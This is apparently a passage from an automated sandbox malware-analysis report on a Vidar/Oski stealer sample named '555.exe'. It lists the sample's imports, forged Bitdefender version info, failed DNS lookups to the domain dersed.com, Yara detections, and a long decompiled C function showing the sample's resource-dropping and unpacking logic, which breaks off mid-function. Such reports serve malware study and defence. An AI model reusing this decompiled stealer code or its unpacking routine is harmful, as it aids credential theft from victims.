MultiByteToWideChar, InterlockedExchange, InterlockedCompareExchange, InterlockedDecrement, InterlockedIncrement
USER32.dll	SendMessageW, PostQuitMessage, DefWindowProcA, LoadBitmapA, DefDlgProcA, ClientToScreen, SendMessageA, CreateWindowExA, InsertMenuItemA, ShowWindow, HideCaret, WindowFromPoint, EnableWindow, UnionRect, SetRect, SetActiveWindow, GetWindowLongA, GetForegroundWindow, IsZoomed, SetWindowPos, GetSystemMetrics, GetWindowRect, EnumChildWindows, PostMessageA, RegisterClassA, SendDlgItemMessageA, GetParent, EndPaint, DrawTextA, GetClientRect, BeginPaint, GetDlgItem, LoadIconA, LoadCursorA, SetWindowLongA, CreateMenu, AppendMenuA, UpdateWindow, GetMessageA, TranslateMessage, DispatchMessageA, IsWinEventHookInstalled, GetActiveWindow
GDI32.dll	CreateFontA, SelectObject, DeleteObject, SetBkMode, CreateFontW, CreateFontIndirectA, TextOutA, StartPage, GetTextMetricsW, GetTextExtentExPointW, ExtTextOutW, EndPage, SetStretchBltMode, GetStockObject
COMDLG32.dll	CommDlgExtendedError, GetSaveFileNameA, ChooseFontA
ADVAPI32.dll	LsaRemoveAccountRights, LsaAddAccountRights
ole32.dll	CoInitialize, CreateBindCtx, MkParseDisplayName
WS2_32.dll	WSACreateEvent, WSAWaitForMultipleEvents
NETAPI32.dll	NetApiBufferFree, NetUserEnum
WINMM.dll	midiInOpen, midiInGetDevCapsA, PlaySoundA, midiInStart, mmioDescend, mmioSeek, midiInClose, mmioClose, midiInGetNumDevs
CRYPT32.dll	CertEnumPhysicalStore
SHLWAPI.dll	SHAutoComplete, PathCompactPathA
COMCTL32.dll	ImageList_GetImageCount, ImageList_LoadImageA, ImageList_Add, ImageList_DragMove, _TrackMouseEvent, ImageList_Create
gdiplus.dll	GdiplusStartup, GdipCloneImage, GdipFree, GdipDeleteGraphics, GdipLoadImageFromFile, GdipDrawImageRectRectI, GdipAlloc, GdipDisposeImage, GdipGetImageWidth, GdipGetImageHeight, GdipCreateFromHDC, GdipSetInterpolationMode
UxTheme.dll	OpenThemeData

Version Infos

Description	Data
LegalCopyright	Bitdefender LLC Copyright . All rights reserved.
CompanyName	Bitdefender LLC
FileDescription	Selfssl Progresses Fatherbard New
Comments	Selfssl Progresses Fatherbard New
ProductName	Cnnmgrestablishcnnectin283715
ProductVersion	8.2.5.127
PrivateBuild	8.2.5.127
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2022 23:53:04.067533016 CET	60758	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.095592022 CET	53	60758	8.8.8.8	192.168.2.4
Mar 22, 2022 23:53:04.115511894 CET	60647	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.136682034 CET	53	60647	8.8.8.8	192.168.2.4
Mar 22, 2022 23:53:04.145426989 CET	64909	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.171823978 CET	53	64909	8.8.8.8	192.168.2.4
Mar 22, 2022 23:53:04.218432903 CET	60381	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.240736008 CET	53	60381	8.8.8.8	192.168.2.4
Mar 22, 2022 23:53:04.260018110 CET	56509	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.281152964 CET	53	56509	8.8.8.8	192.168.2.4
Mar 22, 2022 23:53:04.305391073 CET	54069	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.324481010 CET	53	54069	8.8.8.8	192.168.2.4
Mar 22, 2022 23:53:04.335752964 CET	57747	53	192.168.2.4	8.8.8.8
Mar 22, 2022 23:53:04.354562044 CET	53	57747	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 22, 2022 23:53:04.067533016 CET	192.168.2.4	8.8.8.8	0x8694	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.115511894 CET	192.168.2.4	8.8.8.8	0xeb1c	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.145426989 CET	192.168.2.4	8.8.8.8	0x99f3	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.218432903 CET	192.168.2.4	8.8.8.8	0x774b	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.260018110 CET	192.168.2.4	8.8.8.8	0x764c	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.305391073 CET	192.168.2.4	8.8.8.8	0x2f6	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.335752964 CET	192.168.2.4	8.8.8.8	0x1447	Standard query (0)	dersed.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 22, 2022 23:53:04.095592022 CET	8.8.8.8	192.168.2.4	0x8694	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.136682034 CET	8.8.8.8	192.168.2.4	0xeb1c	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.171823978 CET	8.8.8.8	192.168.2.4	0x99f3	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.240736008 CET	8.8.8.8	192.168.2.4	0x774b	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.281152964 CET	8.8.8.8	192.168.2.4	0x764c	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.324481010 CET	8.8.8.8	192.168.2.4	0x2f6	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)
Mar 22, 2022 23:53:04.354562044 CET	8.8.8.8	192.168.2.4	0x1447	Name error (3)	dersed.com	none	none	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 555.exePID: 6192, Parent PID: 2920

General

Target ID:	0
Start time:	23:52:41
Start date:	22/03/2022
Path:	C:\Users\user\Desktop\555.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\555.exe"
Imagebase:	0x400000
File size:	1304576 bytes
MD5 hash:	ED37EBBE1746DD0D566C8C4769655E0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 555.exePID: 6444, Parent PID: 6192

General

Target ID:	3
Start time:	23:52:59
Start date:	22/03/2022
Path:	C:\Users\user\Desktop\555.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\555.exe
Imagebase:	0x400000
File size:	1304576 bytes
MD5 hash:	ED37EBBE1746DD0D566C8C4769655E0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Vidar, Description: Vidar Payload, Source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, Author: kevoreilly
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6864, Parent PID: 6444

General

Target ID:	11
Start time:	23:53:07
Start date:	22/03/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 1228
Imagebase:	0xb60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 555.exePID: 6192, Parent PID: 2920COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	7.6%
Signature Coverage:	14.4%
Total number of Nodes:	1767
Total number of Limit Nodes:	40

Executed Functions

Function 00408B20 Relevance: 245.0, APIs: 122, Strings: 17, Instructions: 1736
filestringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00408B20() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t500;
				signed int _t501;
				int _t508;
				struct tagSIZE _t516;
				signed int _t523;
				char* _t524;
				struct HWND__* _t525;
				struct HMENU__* _t535;
				void* _t541;
				signed short _t542;
				signed int _t547;
				signed int _t559;
				signed int _t560;
				CHAR* _t577;
				int _t582;
				void* _t589;
				void* _t592;
				int _t593;
				signed int _t597;
				signed int _t605;
				signed int _t606;
				struct HWND__* _t608;
				void* _t609;
				intOrPtr _t610;
				CHAR* _t611;
				signed short _t613;
				struct HWND__* _t616;
				signed int _t627;
				int _t631;
				signed int _t632;
				long _t638;
				void* _t640;
				int _t642;
				int _t649;
				signed int _t650;
				signed int _t655;
				int _t669;
				signed int _t673;
				long _t676;
				long _t677;
				int _t699;
				char* _t702;
				struct HWND__* _t704;
				signed int _t705;
				signed int _t711;
				struct HMMIO__* _t716;
				int _t720;
				int _t721;
				WCHAR* _t723;
				signed int _t725;
				int _t728;
				signed int _t733;
				struct HWND__* _t734;
				long _t735;
				void* _t738;
				signed int _t742;
				CHAR* _t743;
				signed int _t747;
				signed int _t749;
				signed int _t752;
				int _t755;
				struct HWND__* _t756;
				int _t763;
				long _t768;
				CHAR* _t771;
				signed int _t773;
				int _t781;
				int _t797;
				char* _t799;
				signed int _t802;
				struct _MMCKINFO _t804;
				long _t806;
				intOrPtr _t815;
				intOrPtr _t816;
				intOrPtr _t817;
				signed int _t818;
				struct HWND__* _t824;
				struct HMMIO__* _t828;
				signed char _t830;
				int _t831;
				int _t833;
				struct HRSRC__* _t834;
				void* _t835;
				long _t841;
				signed short _t842;
				void* _t845;
				struct tagRECT _t846;
				struct HDC__* _t847;
				void* _t848;
				signed int _t852;
				void* _t856;
				struct HWND__* _t861;
				intOrPtr _t863;
				intOrPtr _t864;
				signed int _t865;
				struct HMMIO__* _t866;
				struct HWND__* _t867;
				long _t868;
				signed int _t872;
				signed int _t882;
				signed int _t896;
				void _t900;
				struct HWND__* _t901;
				signed int _t903;
				struct HWND__* _t910;
				struct HWND__* _t912;
				signed int _t914;
				struct HMMIO__* _t921;
				signed int _t929;
				void _t930;
				int _t935;
				long _t936;
				int _t942;
				int _t943;
				signed int _t944;
				int _t945;
				signed char _t949;
				long _t954;
				char* _t955;
				CHAR* _t957;
				int _t959;
				long _t961;
				long _t963;
				CHAR* _t965;
				void* _t969;
				long _t973;
				intOrPtr _t987;
				intOrPtr _t988;
				intOrPtr _t989;
				intOrPtr _t990;
				signed short _t991;
				signed int _t993;
				struct HINSTANCE__* _t998;
				signed int _t999;
				int _t1003;
				WCHAR* _t1004;
				long _t1009;
				long _t1010;
				signed short _t1015;
				int _t1023;
				char* _t1025;
				int _t1026;
				signed int _t1036;
				signed int _t1037;
				int _t1039;
				struct HWND__* _t1043;
				void* _t1054;
				long _t1068;
				struct HMMIO__* _t1077;
				struct HWND__* _t1082;
				int _t1083;
				intOrPtr _t1087;
				signed int _t1096;
				signed int _t1100;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				int _t1105;
				int _t1106;
				intOrPtr _t1114;
				intOrPtr _t1115;
				intOrPtr _t1116;
				signed int _t1120;
				signed int _t1121;
				long _t1122;
				signed int _t1123;
				signed int _t1126;
				signed int _t1127;
				int _t1128;
				void* _t1131;
				WCHAR* _t1132;
				struct HDC__* _t1134;
				HMIDIIN* _t1135;
				void* _t1141;
				signed int _t1142;
				short* _t1143;
				int _t1144;
				signed int _t1145;
				signed int _t1149;
				int _t1150;
				signed int _t1151;
				signed int _t1152;
				struct HWND__* _t1154;
				long _t1155;
				signed int _t1156;
				signed int _t1159;
				void* _t1162;
				intOrPtr _t1163;
				struct HDC__* _t1164;
				int _t1165;
				struct HWND__* _t1167;
				struct HWND__* _t1168;
				struct HWND__* _t1169;
				signed int _t1170;
				signed int _t1171;
				short* _t1172;
				int _t1173;
				signed int _t1174;
				CHAR* _t1175;
				signed int _t1176;
				void* _t1177;
				intOrPtr _t1179;
				void* _t1181;
				void* _t1241;
				void* _t1244;
				void* _t1258;
				void* _t1259;
				void* _t1261;

				_t1176 = _t1177 - 0x77c;
				_push(0xfffffffe);
				_push(0x459ee8);
				_push(E00423A30);
				_push( *[fs:0x0]);
				_t1179 = _t1177 - 0x730;
				_t500 =  *0x4608e0; // 0xb51ec2b3
				 *(_t1176 - 8) =  *(_t1176 - 8) ^ _t500;
				_t501 = _t500 ^ _t1176;
				 *(_t1176 + 0x778) = _t501;
				_push(_t501);
				 *[fs:0x0] = _t1176 - 0x10;
				 *((intOrPtr*)(_t1176 - 0x18)) = _t1179;
				 *(_t1176 - 0x40) =  *(_t1176 + 0x784);
				_t865 =  *0x462f68; // 0x211
				_t1181 =  *0x462b38 - _t865; // 0x0
				if(_t1181 == 0) {
					_t993 =  *0x4631f8; // 0x2a8
					 *0x4631d8 =  *0x4631d8 - _t993;
					__eflags =  *0x4631d8;
				} else {
					_t818 =  *0x462740; // 0x3c3fbd7
					_t991 =  *0x463200; // 0x211
					asm("cdq");
					 *0x462f68 = _t818 * _t865 / (_t991 + 0x3e) +  *0x462b40 +  *0x462f78;
				}
				 *(_t1176 - 0x28) = 0;
				 *(_t1176 - 0x30) = 0;
				_t866 =  *0x4631e4; // 0x0
				 *(_t1176 - 0x1c) = _t866;
				if( *0x46320c != 4) {
					L64:
					mmioClose( *(_t1176 - 0x1c), 0);
					_t1141 = CreateFileA(0x462a28, 0x80000000, 1, 0, 3, 0x80, 0);
					if( *(_t1176 - 0x30) == 0) {
						GetFileSize(_t1141, 0);
						SetFilePointer(_t1141, 0xffffff80, 0, 2);
						_t797 = ReadFile(_t1141, _t1176 + 0x6f8, 0x80, _t1176 - 0x20, 0); // executed
						if(_t797 == 0) {
							CloseHandle(_t1141);
						}
					}
					SetFilePointer(_t1141, 0, 0, 0); // executed
					_t508 = ReadFile(_t1141, _t1176 + 0x54, 0xa, _t1176 - 0x20, 0); // executed
					if(_t508 != 0 &&  *(_t1176 - 0x20) == 0xa &&  *(_t1176 + 0x54) == 0x49 &&  *((char*)(_t1176 + 0x55)) == 0x44 &&  *((char*)(_t1176 + 0x56)) == 0x33) {
						 *(_t1176 - 0x28) = (((( *(_t1176 + 0x5a) & 0x0000007f) << 0x00000007 |  *(_t1176 + 0x5b) & 0x0000007f) << 0x00000007 |  *(_t1176 + 0x5c) & 0x0000007f) << 0x00000007 |  *(_t1176 + 0x5d) & 0x0000007f) + 0xa;
					}
					SetFilePointer(_t1141,  *(_t1176 - 0x28), 0, 0); // executed
					_t867 =  *0x463210; // 0x0
					ClientToScreen(_t867, _t1176 - 0x48);
					WindowFromPoint( *(_t1176 - 0x48));
					GetActiveWindow();
					_t868 =  *0x4631d8; // 0xfff48ebd
					_t998 =  *0x4631e8; // 0x789
					PlaySoundA(0x462a28, _t998, _t868);
					 *(_t1176 + 0x50) = 0x10;
					 *(_t1176 + 0x54) = 2;
					_t516 =  *0x463210; // 0x0
					 *(_t1176 + 0x58) = _t516;
					__imp___TrackMouseEvent(_t1176 + 0x50,  *(_t1176 - 0x44));
					_t999 =  *0x462f8c; // 0x4770000
					 *0x4631f8 = (1 -  *0x462b34) *  *0x4631f8 - _t999 *  *0x462f7c *  *0x462740 + ( *0x4631fc & 0x000000ff) + ( *0x462f68 & 0x000000ff);
					_t824 =  *0x4631e4; // 0x0
					_t1241 =  *0x4631ec - _t824; // 0x0
					if(_t1241 != 0) {
						_t523 =  *0x463204; // 0x4
						_t524 = _t523 *  *0x463200;
						__eflags = _t524;
					} else {
						_t524 =  *(_t1176 - 0x40);
					}
					 *(_t1176 - 0x30) = _t524;
					 *(_t1176 - 0x20) = _t824;
					 *(_t1176 - 0x1c) = _t824;
					_t1003 =  *0x4631dc; // 0x2ad58
					_t1004 = _t1003 +  *0x4631d8;
					_t525 =  *0x463210; // 0x0
					GetDlgItem(_t525, _t1004);
					_t1142 =  *0x46320c; // 0x0
					_t1143 = 0x462820 + _t1142 * 2;
					lstrcpyW(_t1176 + 0x478, 0x451a4c);
					if(_t1143 == 0 ||  *_t1143 == 0) {
						_t1004 = _t1176 + 0x60;
						GetCurrentDirectoryW(0x104, _t1004);
					}
					_t872 =  *0x4631e8; // 0x789
					_t1244 = _t872 -  *0x4631e4; // 0x0
					if(_t1244 <= 0) {
						L117:
						_t1144 = 0;
						_t1120 =  *0x4631f0; // 0x3b8402f
						__eflags = _t1120;
						if(_t1120 != 0) {
							__eflags =  *0x4631fc - _t1144; // 0x789
							if(__eflags != 0) {
								__eflags = _t872;
								if(_t872 != 0) {
									_t1102 =  *0x463210; // 0x0
									_t747 = _t1102 * 4 -  *0x46320c +  *0x4631e4;
									__eflags = _t747;
									_t1103 =  *0x463204; // 0x4
									_t149 = _t747 + 4; // 0x8
									 *0x463204 = _t1103 + _t149;
								}
							}
						}
						 *0x462b3c = (0x2e8ba2e9 * _t872 >> 0x20 >> 3 >> 0x1f) + (0x2e8ba2e9 * _t872 >> 0x20 >> 3) - (0x2e8ba2e9 *  *0x462f60 >> 0x20 >> 1 >> 0x1f) + (0x2e8ba2e9 *  *0x462f60 >> 0x20 >> 1) + _t1120;
						_t828 =  *(_t1176 - 0x40);
						_t1009 =  *0x46320c; // 0x0
						 *(_t1176 + 0x574) = _t1009;
						E00422B80(_t1176 + 0x575, _t1144, 0x103);
						_t1179 = _t1179 + 0xc;
						 *(_t1176 + 0xc) = 0x30;
						 *(_t1176 + 0x10) = 0x17;
						 *(_t1176 + 0x14) = _t1144;
						 *(_t1176 + 0x18) = _t1144;
						 *(_t1176 + 0x30) = _t1176 + 0x574;
						 *(_t1176 + 0x34) = 0x104;
						_t1010 =  *0x4631d8; // 0xfff48ebd
						 *(_t1176 + 0x1c) = _t1010;
						_t535 =  *0x46320c; // 0x0
						 *(_t1176 + 0x20) = _t535;
						InsertMenuItemA(_t535, _t535, _t1144, _t1176 + 0xc);
						 *(_t1176 - 0x30) = _t1144;
						 *(_t1176 - 0x28) = _t1144;
						lstrcpyW(_t1176 + 0x6b0, L"\\\\");
						NetUserEnum(_t1176 + 0x6b0, _t1144, _t1144, _t1176 - 0x30, 0x2580, _t1176 - 0x20, _t1176 - 0x38, _t1176 - 0x28); // executed
						 *(_t1176 - 0x24) = _t1144;
						__eflags =  *(_t1176 - 0x20) + 5;
						if( *(_t1176 - 0x20) + 5 == 0) {
							_t882 =  *0x4631f4; // 0xfff48ebd
							goto L132;
						} else {
							do {
								_t1172 =  *0x4631d8; // 0xfff48ebd
								_t723 =  *0x4631dc; // 0x2ad58
								lstrlenW(_t723);
								_t725 =  *0x4631fc; // 0x789
								_t961 =  *0x46320c; // 0x0
								 *0x460334 =  &(( *0x460334)[_t961 + (_t725 +  *0x4631d8) * 2 + _t725 +  *0x4631d8]);
								 *0x463210 = ImageList_DragMove(0, 0);
								_t728 =  *0x4631e4; // 0x0
								_t828 = _t828 + (_t728 + 1) *  *0x4631f4;
								 *(_t1176 - 0x1c) = _t828;
								lstrcpyA(_t1176 + 0x268, "empty");
								 *(_t1176 - 0x20) = 0;
								PathCompactPathA(0, 0, 0);
								 *0x4631ec = 0;
								__eflags = _t1172;
								if(_t1172 != 0) {
									_t733 = lstrlenW(_t1172); // executed
									__eflags = _t733;
									if(_t733 != 0) {
										_t734 =  *0x463210; // 0x0
										_t194 = _t734 + 5; // 0x5
										_t963 =  *0x46320c; // 0x0
										_t195 = _t963 + 1; // 0x1
										_t1096 = (_t194 * _t195 * 4 - 1) * (0x14 - _t963) -  *0x462f60 + _t734;
										__eflags = _t1096;
										_t735 =  *0x4631d8; // 0xfff48ebd
										_t199 = _t1096 + 0x1d1; // 0xfff4908e
										 *0x4631d8 = _t735 + _t199;
										WideCharToMultiByte(0, 0, _t1172, 0xffffffff, _t1176 + 0x36c, 0x100, 0, 0);
										_t828 =  *(_t1176 - 0x1c);
										L128:
										_t882 =  *0x4631f4; // 0xfff48ebd
										goto L129;
									}
									lstrcpyA(_t1176 + 0x36c, ")");
									_t965 =  *0x460334; // 0xc30c4
									_t882 =  &(_t965[ *0x4631dc]) * (_t828 - 2);
									 *0x4631f4 = _t882;
									goto L129;
								}
								_t742 =  *0x46320c; // 0x0
								_t1100 = _t742 + _t742 * 4;
								_t743 =  *0x460334; // 0xc30c4
								_t189 = _t1100 * 2; // 0xc32c0
								 *0x460334 =  &(_t743[_t189 + 0x1fc]);
								lstrcpyA(_t1176 + 0x36c, "(");
								goto L128;
								L129:
								_t738 =  *(_t1176 - 0x24) + 1;
								 *(_t1176 - 0x24) = _t738;
								__eflags = _t738 -  *(_t1176 - 0x20) + 5;
							} while (_t738 <  *(_t1176 - 0x20) + 5);
							_t1144 = 0;
							L132:
							_t541 =  *(_t1176 - 0x30);
							__eflags = _t541 - _t1144;
							if(_t541 != _t1144) {
								NetApiBufferFree(_t541);
								_t882 =  *0x4631f4; // 0xfff48ebd
							}
							_t1145 =  *0x463210; // 0x0
							_t542 =  *0x462b40; // 0xfffffe1c
							_t1015 =  *0x463200; // 0x211
							_t1121 =  *0x462f68; // 0x211
							 *0x462f68 = _t1145 * _t542 + _t1015 + _t1121 * 2;
							_t1149 =  *0x46320c; // 0x0
							_t1122 =  *0x4631d8; // 0xfff48ebd
							_t209 = _t1122 + 1; // 0x1
							_t830 = (_t1149 + _t209) *  *0x4631dc;
							 *0x4631d8 = _t830;
							 *0x462f90 = "Originally thought inhere Decrement ";
							_t1123 =  *0x462f8c; // 0x4770000
							__eflags = _t1123 - (_t542 & 0x0000ffff) -  *0x462740; // 0x3c3fbd7
							if(__eflags == 0) {
								_t882 = ( *0x462f64 & 0x0000ffff) -  *0x463204;
								__eflags = _t882;
							}
							_t210 = _t1015 + 0x53; // 0x264
							asm("cdq");
							 *0x463208 = _t830 / _t210 *  *0x462f64;
							_t547 =  *0x462b44; // 0x0
							 *0x462b3c = (_t830 & 0x000000ff) * _t1149 + _t547 *  *0x462b3c -  *0x4631ec;
							_t1126 =  *0x4631dc; // 0x2ad58
							__eflags = _t1126;
							if(_t1126 != 0) {
								_t1087 =  *0x462744; // 0x0
								_t852 = _t830 + _t1087 -  *0x462f60;
								__eflags = _t852;
								 *0x4631d8 = _t852;
							}
							_t1023 = (0x8d3dcb09 * _t882 >> 0x20) + _t882 >> 4;
							__eflags = (_t1023 >> 0x1f) + _t1023 -  *0x463204 -  *0x462f8c; // 0x4770000
							if(__eflags <= 0) {
								_t1023 = 0x2b48 * _t1149;
								_t1127 = _t1126 - _t1023;
								__eflags = _t1127;
								 *0x4631f4 = _t1127;
							} else {
								 *0x4631f4 = _t1149;
							}
							_t1128 = CreateFontW( ~(MulDiv(0xa, 0x60, 0x48)), 0, 0, 0, 0x190, 0, 0, 0, 0x80, 0, 0, 0, 0, L"MS Shell Dlg");
							_t1150 = 0;
							__eflags = _t1128;
							if(_t1128 != 0) {
								_t1150 = 1;
							}
							_t559 = CreateWindowExA(0, "BUTTON", "Id", 0x50000000, 0, 0, 0, 0, _t1128, 1, GetModuleHandleA(0), 0); // executed
							 *(_t1176 - 0x20) = _t559;
							__eflags = _t559;
							if(_t559 != 0) {
								_t1151 = _t1150 + 0x10;
								__eflags = _t1151;
							} else {
								_t1151 = _t1150 +  *0x46320c;
							}
							 *(_t1176 - 0x1c) = _t1151;
							_t560 = _t1151;
							asm("cdq");
							_t1152 = _t560;
							_t831 = _t1023;
							 *(_t1176 - 0x5c) = _t560 + 0x7a4101d3;
							asm("adc eax, 0xb74048f7");
							 *(_t1176 - 0x58) = _t831;
							 *(_t1176 - 0x54) = 0xcf56a7d7 - _t1152;
							asm("sbb eax, ebx");
							 *((intOrPtr*)(_t1176 - 0x50)) = 0x31fd1da7;
							 *(_t1176 - 0x2c) = E00423BC0(_t1152, _t831, 0xcab19233, 0xf3be2527);
							 *(_t1176 - 0x28) = _t1023;
							 *(_t1176 - 0x48) = _t1152;
							 *(_t1176 - 0x44) = _t831;
							asm("cdq");
							 *((intOrPtr*)(_t1176 + 0x48)) =  *(_t1176 - 0x1c) + 8;
							 *(_t1176 + 0x4c) = _t1023;
							 *(_t1176 - 0x24) = SendMessageA( *(_t1176 - 0x20), 0x30, _t1128, 0);
							_t1025 =  *(_t1176 - 0x5c);
							 *((intOrPtr*)(_t1176 - 0x34)) = E00423BC0( *(_t1176 - 0x54),  *((intOrPtr*)(_t1176 - 0x50)), _t1025,  *(_t1176 - 0x58));
							 *(_t1176 - 0x30) = _t1025;
							_t1026 =  *(_t1176 - 0x28);
							 *(_t1176 - 0x2c) = E00423BC0(_t1152, _t831,  *(_t1176 - 0x2c), _t1026) +  *((intOrPtr*)(_t1176 - 0x34));
							asm("adc edx, [ebp-0x30]");
							 *(_t1176 - 0x28) = _t1026;
							_t833 = E00423BC0(_t1152, _t831, 0xd0b1961e, 0x2f71a37) +  *((intOrPtr*)(_t1176 - 0x34));
							asm("adc edx, [ebp-0x30]");
							 *(_t1176 + 0x5c) = _t1026;
							_t1154 = _t1152 *  *(_t1176 - 0x1c) + 0x636f6c6b;
							_t577 = GlobalAlloc(0x40, 0x20);
							__eflags =  *(_t1176 - 0x24);
							if( *(_t1176 - 0x24) == 0) {
								 *_t577 =  *(_t1176 - 0x2c);
								_t577[4] =  *(_t1176 - 0x28);
								 *(_t1176 - 0x30) = LoadLibraryA(_t577);
								 *(_t1176 - 0x24) = EnableWindow( *(_t1176 - 0x20), 0);
								 *(_t1176 - 0x28) = GlobalAlloc(0x40, 0x20);
								__eflags =  *(_t1176 - 0x24);
								if( *(_t1176 - 0x24) == 0) {
									_t582 =  *(_t1176 - 0x28);
									 *_t582 = _t833;
									 *(_t582 + 4) =  *(_t1176 + 0x5c);
									DefDlgProcA( *(_t1176 - 0x20),  *(_t1176 - 0x48),  *(_t1176 - 0x5c),  *(_t1176 - 0x54));
									_t834 = FindResourceA(0, "open", "file");
									__eflags = _t834;
									if(_t834 == 0) {
										_t721 =  *(_t1176 - 0x28);
										 *(_t721 + 8) = _t1154;
										 *(_t721 + 0xc) = _t834;
									}
									_t1155 = SizeofResource(0, _t834);
									 *(_t1176 - 0x24) = LockResource(LoadResource(0, _t834));
									_t589 = CreateFileA("close", 0x40000000, 0, 0, 3, 0x80, 0); // executed
									_t835 = _t589;
									__eflags = _t835 - 0xffffffff;
									if(_t835 == 0xffffffff) {
										 *(_t1176 - 0x30) = GetProcAddress( *(_t1176 - 0x30),  *(_t1176 - 0x28));
									} else {
										_t720 =  *0x4631e4; // 0x0
										 *_t720 = 0x1ced36d;
									}
									_t592 = WriteFile(_t835,  *(_t1176 - 0x24), _t1155, _t1176 - 0x38, 0); // executed
									__eflags = _t592;
									if(_t592 != 0) {
										_t593 =  *0x4631e4; // 0x0
										 *_t593 = 0x1ced36d;
									} else {
										 *0x462f8c = VirtualAlloc(_t592, 0x37000, 0x3000,  *((intOrPtr*)(_t1176 + 0x48)) + 0x37);
									}
									CloseHandle(_t835);
									_t1156 =  *0x4628af; // 0x0
									_t597 =  *0x460334; // 0xc30c4
